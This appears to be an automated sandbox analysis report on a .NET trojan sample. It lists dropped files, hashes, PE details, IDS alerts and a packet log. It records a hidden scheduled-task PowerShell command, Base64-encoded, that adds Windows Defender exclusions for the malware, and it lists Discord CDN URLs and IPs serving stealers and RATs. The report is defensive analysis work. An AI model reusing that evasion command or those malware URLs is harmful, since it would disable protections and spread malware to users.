                                            05:21:55Task SchedulerRun new task: vnjxqzrlpd path: powershell.exe s>-ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAWABzAGQAVAB5AHAAZQBcAFQAYQByAGcAZQB0AC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAagBvAG4AZQBzAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAWABzAGQAVAB5AHAAZQBcAFQAYQByAGcAZQB0AC4AZQB4AGUA
                                            05:21:55Task SchedulerRun new task: Target path: C:\Users\user\AppData\Roaming\XsdType\Target.exe
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            162.159.135.233Cheat.Lab.2.7.2.msiGet hashmaliciousRedLineBrowse
                                            • cdn.discordapp.com/attachments/1166694393298817025/1171047481182793729/2.txt
                                            #U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeGet hashmaliciousUnknownBrowse
                                            • cdn.discordapp.com/attachments/1161633037004587060/1161731056462995496/lient.exe
                                            QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeGet hashmaliciousAgentTesla, AveMariaBrowse
                                            • cdn.discordapp.com/attachments/1152164172566630421/1153190859320328273/Vvdsupbjet.exe
                                            We7WnoqeXe.exeGet hashmaliciousAmadey RedLineBrowse
                                            • cdn.discordapp.com/attachments/878034206570209333/908097655173947432/slhost.exe
                                            mosoxxxHack.exeGet hashmaliciousAmadey RedLineBrowse
                                            • cdn.discordapp.com/attachments/710557342755848243/876828681815871488/clp.exe
                                            Sales-contract-deaho-180521-poweruae.docGet hashmaliciousUnknownBrowse
                                            • cdn.discordapp.com/attachments/843685789120331799/844316591284944986/poiu.exe
                                            PURCHASE ORDER E3007921.EXEGet hashmaliciousSnake KeyloggerBrowse
                                            • cdn.discordapp.com/attachments/809311531652087809/839820005927550996/Youngest_Snake.exe
                                            Waybill Document 22700456.exeGet hashmaliciousNanocoreBrowse
                                            • cdn.discordapp.com/attachments/809311531652087809/839856358152208434/May_Blessing.exe
                                            COMPANY REQUIREMENT.docGet hashmaliciousSnake KeyloggerBrowse
                                            • cdn.discordapp.com/attachments/819674896988242004/819677189900861500/harcout.exe
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            cdn.discordapp.comsegura.vbsGet hashmaliciousRemcosBrowse
                                            • 162.159.135.233
                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                            • 162.159.129.233
                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Quasar, StealcBrowse
                                            • 162.159.134.233
                                            LDlanZur0i.exeGet hashmaliciousUnknownBrowse
                                            • 162.159.135.233
                                            Fa1QSXjTZD.exeGet hashmaliciousUnknownBrowse
                                            • 162.159.133.233
                                            xxImTScxAq.exeGet hashmaliciousUnknownBrowse
                                            • 162.159.135.233
                                            FvmhkYIi5P.exeGet hashmaliciousUnknownBrowse
                                            • 162.159.134.233
                                            FvmhkYIi5P.exeGet hashmaliciousUnknownBrowse
                                            • 162.159.135.233
                                            EUOgPjsBTC.exeGet hashmaliciousUnknownBrowse
                                            • 162.159.135.233
                                            https://cdn.discordapp.com/attachments/1238968627324125338/1296061386824093747/shortlist.zip?ex=6710eaba&is=670f993a&hm=26822365df14863bfea627ad912a327a69fb54ae8b0d7ba1003822b35800c605&Get hashmaliciousUnknownBrowse
                                            • 162.159.129.233
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            CLOUDFLARENETUSICBM.exeGet hashmaliciousXmrigBrowse
                                            • 104.26.9.242
                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                            • 188.114.96.3
                                            file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                            • 188.114.97.3
                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                            • 188.114.96.3
                                            2Lzx7LMDWV.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 188.114.96.3
                                            https://my-homepagero.sa.com/exml/Get hashmaliciousHTMLPhisherBrowse
                                            • 188.114.96.3
                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                            • 188.114.97.3
                                            NF_Payment_Ref_FAN930276.exeGet hashmaliciousFormBookBrowse
                                            • 188.114.96.3
                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                            • 188.114.96.3
                                            FW CMA SHZ Freight invoice CHN1080769.exeGet hashmaliciousFormBookBrowse
                                            • 188.114.96.3
                                            JANETJiscServicesLimitedGBSuNMTBkfPo.elfGet hashmaliciousUnknownBrowse
                                            • 137.44.97.243
                                            j3Lr4Fk7Kb.elfGet hashmaliciousMiraiBrowse
                                            • 128.40.121.108
                                            belks.spc.elfGet hashmaliciousMiraiBrowse
                                            • 157.228.187.210
                                            jew.arm.elfGet hashmaliciousUnknownBrowse
                                            • 150.204.93.231
                                            la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                            • 147.197.13.180
                                            ppc.elfGet hashmaliciousUnknownBrowse
                                            • 194.80.189.41
                                            la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                            • 143.53.80.209
                                            la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                            • 143.234.189.16
                                            la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                            • 146.97.204.113
                                            la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                            • 129.12.155.165
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            3b5074b1b5d032e5620f69f9f700ff0e2Lzx7LMDWV.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 162.159.135.233
                                            Quotation Document.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                            • 162.159.135.233
                                            file.exeGet hashmaliciousUnknownBrowse
                                            • 162.159.135.233
                                            file.exeGet hashmaliciousUnknownBrowse
                                            • 162.159.135.233
                                            greatthingswithmegoods.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                                            • 162.159.135.233
                                            seethebestthingswithgreatthingshrewithme.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                                            • 162.159.135.233
                                            creatednewthingsformee.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                                            • 162.159.135.233
                                            greenthingswithgreatnewsforgetmeback.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                                            • 162.159.135.233
                                            TJXpRilNkh.exeGet hashmaliciousXWormBrowse
                                            • 162.159.135.233
                                            IM3OLcx7li.exeGet hashmaliciousXWormBrowse
                                            • 162.159.135.233
                                            No context
                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe
                                            File Type:CSV text
                                            Category:dropped
                                            Size (bytes):838
                                            Entropy (8bit):5.356471432431617
                                            Encrypted:false
                                            SSDEEP:24:ML9E4KQwKDE4KGKZI6KhRAE4KKUNCsXE4Npv:MxHKQwYHKGSI6oRAHKKkhHNpv
                                            MD5:E56A6A79CB531084A51F12C271BE7439
                                            SHA1:97A016CBE4C221936BAB8F76D33F7C021AA19ADF
                                            SHA-256:FA63B35C53D1B58B86D8C3CB3976AF7B7C096FD787EF1D33F63F5A31C87BC3E3
                                            SHA-512:B090CA13606574646D98D7B6F0FD5B16A7A6471FDC4F3CECDCFDDCC23925F97A3F0F5EEF3ECBE81A29B769FE7BCFF88DA0950FFD9A8D0FD2804F36171DE31D7A
                                            Malicious:true
                                            Reputation:moderate, very likely benign file
                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\8af759007c012da690062882e06694f1\System.Management.ni.dll",0..
                                            Process:C:\Users\user\AppData\Roaming\XsdType\Target.exe
                                            File Type:CSV text
                                            Category:dropped
                                            Size (bytes):838
                                            Entropy (8bit):5.356471432431617
                                            Encrypted:false
                                            SSDEEP:24:ML9E4KQwKDE4KGKZI6KhRAE4KKUNCsXE4Npv:MxHKQwYHKGSI6oRAHKKkhHNpv
                                            MD5:E56A6A79CB531084A51F12C271BE7439
                                            SHA1:97A016CBE4C221936BAB8F76D33F7C021AA19ADF
                                            SHA-256:FA63B35C53D1B58B86D8C3CB3976AF7B7C096FD787EF1D33F63F5A31C87BC3E3
                                            SHA-512:B090CA13606574646D98D7B6F0FD5B16A7A6471FDC4F3CECDCFDDCC23925F97A3F0F5EEF3ECBE81A29B769FE7BCFF88DA0950FFD9A8D0FD2804F36171DE31D7A
                                            Malicious:false
                                            Reputation:moderate, very likely benign file
                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\8af759007c012da690062882e06694f1\System.Management.ni.dll",0..
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):64
                                            Entropy (8bit):1.1940658735648508
                                            Encrypted:false
                                            SSDEEP:3:NlllulVmdtZ:NllUM
                                            MD5:013016A37665E1E37F0A3576A8EC8324
                                            SHA1:260F55EC88E3C4D384658F3C18C7FDEF202E47DD
                                            SHA-256:20C6A3C78E9B98F92B0F0AA8C338FF0BAC1312CBBFE5E65D4C940B828AC92FD8
                                            SHA-512:99063E180730047A4408E3EF8ABBE1C53DEC1DF04469DFA98666308F60F8E35DEBF7E32066FE0DD1055E1181167061B3512EEE4FE72D0CD3D174E3378BA62ED8
                                            Malicious:false
                                            Reputation:moderate, very likely benign file
                                            Preview:@...e................................................@..........
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe
                                            File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                            Category:dropped
                                            Size (bytes):732160
                                            Entropy (8bit):7.954701278561676
                                            Encrypted:false
                                            SSDEEP:12288:ZUtPs9xecJnHWTvdk4kRn2Bi+VHlT8J1Ag7djUb0PsKXmC7We0CarwtD7N/ptZcQ:ZUtUvaTVk4i2eJVJxPspOWe0TG/pXvY/
                                            MD5:11B29218685A3C58CAB85C9D39D52DCE
                                            SHA1:45EAFE726262C18DF3AC8D96EC8ECAD979D3F9CA
                                            SHA-256:29C2B7C56BA64DE00927C8AA2A4B41CEAD21000B709CB7470B6DE6F2370C9178
                                            SHA-512:ACD143C7C89743EFB759892D917779EC585A6DD5CAF6D75A79BF96155AD9E32DAB074AD2495B813995F7312A98911541D570CF3DF477AE653A6220EF66C412BC
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Avira, Detection: 100%
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: ReversingLabs, Detection: 45%
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...?S`...............0..$............... ....@...... ....................................`...@......@............... ...............................`..`............................................................................................ ..H............text....#... ...$.................. ..`.rsrc...`....`.......&..............@..@........................................H.......t...LT...........................................................*...(....*..0..........8....*... ....o....8,..... .... ...oa~J...{n...a(*...(....o....88..... ...o ...;a~J...{^...a(*...(....o....8....s......8........o......o....o......8.....s......8..... 0G.......%.....(....s......8..........s......8.........o....8......o....s......8.............8..........o....&8.......s......8.......(......8.........o....8r....+...(...... @.P4 ....c 9K.]a~J...{....a(*...( .........o!...&8B.
                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):26
                                            Entropy (8bit):3.95006375643621
                                            Encrypted:false
                                            SSDEEP:3:ggPYV:rPYV
                                            MD5:187F488E27DB4AF347237FE461A079AD
                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                            Malicious:true
                                            Preview:[ZoneTransfer]....ZoneId=0
                                            File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                            Entropy (8bit):7.954701278561676
                                            TrID:
                                            • Win64 Executable GUI Net Framework (217006/5) 49.88%
                                            • Win64 Executable GUI (202006/5) 46.43%
                                            • Win64 Executable (generic) (12005/4) 2.76%
                                            • Generic Win/DOS Executable (2004/3) 0.46%
                                            • DOS Executable Generic (2002/1) 0.46%
                                            File name:SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe
                                            File size:732'160 bytes
                                            MD5:11b29218685a3c58cab85c9d39d52dce
                                            SHA1:45eafe726262c18df3ac8d96ec8ecad979d3f9ca
                                            SHA256:29c2b7c56ba64de00927c8aa2a4b41cead21000b709cb7470b6de6f2370c9178
                                            SHA512:acd143c7c89743efb759892d917779ec585a6dd5caf6d75a79bf96155ad9e32dab074ad2495b813995f7312a98911541d570cf3df477ae653a6220ef66c412bc
                                            SSDEEP:12288:ZUtPs9xecJnHWTvdk4kRn2Bi+VHlT8J1Ag7djUb0PsKXmC7We0CarwtD7N/ptZcQ:ZUtUvaTVk4i2eJVJxPspOWe0TG/pXvY/
                                            TLSH:20F42395BF87569AC955093E81EB381403E5D7AF363BEA813E4E11C05F12BD68EC0BD8
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...?S`...............0..$............... ....@...... ....................................`...@......@............... .....
                                            Icon Hash:90cececece8e8eb0
                                            Entrypoint:0x400000
                                            Entrypoint Section:
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE
                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                            Time Stamp:0xA760533F [Thu Dec 26 05:57:19 2058 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:
                                            Instruction
                                            dec ebp
                                            pop edx
                                            nop
                                            add byte ptr [ebx], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax+eax], al
                                            add byte ptr [eax], al
                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xb60000x560.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x20000xb23d00xb24006e9cbf446ecb0377c5b39eff61144786False0.9614045516304348data7.958809477078381IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rsrc0xb60000x5600x60012442c70cf672bf3edc5c1702daeb66dFalse0.4016927083333333data3.9448227870487322IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                            RT_VERSION0xb60a00x2d4data0.43370165745856354
                                            RT_MANIFEST0xb63740x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                            2024-11-01T06:22:13.241407+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.109.210.53443192.168.2.449743TCP
                                            2024-11-01T06:22:51.551333+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.109.210.53443192.168.2.449793TCP
                                            TimestampSource PortDest PortSource IPDest IP
                                            Nov 1, 2024 06:22:00.964457035 CET497301010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:00.969548941 CET101049730147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:00.969679117 CET497301010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:01.324985981 CET497301010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:01.329906940 CET101049730147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:01.329967976 CET497301010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:01.334768057 CET101049730147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:01.656799078 CET101049730147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:01.689968109 CET101049730147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:01.690027952 CET497301010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:01.719891071 CET497301010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:01.725085974 CET101049730147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:01.725152016 CET497301010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:01.868726969 CET497311010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:01.873668909 CET101049731147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:01.873754025 CET497311010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:01.920394897 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:01.920434952 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:01.920497894 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:01.930640936 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:01.930654049 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:01.956099033 CET497311010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:01.961069107 CET101049731147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:01.961124897 CET497311010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:01.965894938 CET101049731147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:02.548017025 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:02.548105001 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:02.558765888 CET101049731147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:02.559990883 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:02.560005903 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:02.560216904 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:02.592024088 CET101049731147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:02.592076063 CET497311010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:02.592681885 CET497311010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:02.597776890 CET101049731147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:02.597824097 CET497311010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:02.630996943 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:02.675333977 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:02.707592010 CET497331010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:02.712578058 CET101049733147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:02.712646008 CET497331010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:02.732067108 CET497331010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:02.742593050 CET101049733147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:02.742650986 CET497331010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:02.747905970 CET101049733147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:02.848589897 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:02.848681927 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:02.848712921 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:02.848737001 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:02.848741055 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:02.848763943 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:02.848788023 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:02.848798037 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:02.848830938 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:02.848872900 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:02.848877907 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:02.848968029 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:02.848973989 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:02.966943026 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:02.966978073 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:02.967006922 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:02.967020988 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:02.967078924 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:02.967113018 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:02.967119932 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:02.967169046 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:02.967173100 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:02.967768908 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:02.967830896 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:02.967837095 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:02.967883110 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:02.967925072 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:02.967930079 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:02.967962980 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:02.968045950 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:02.968051910 CET44349732162.159.135.233192.168.2.4
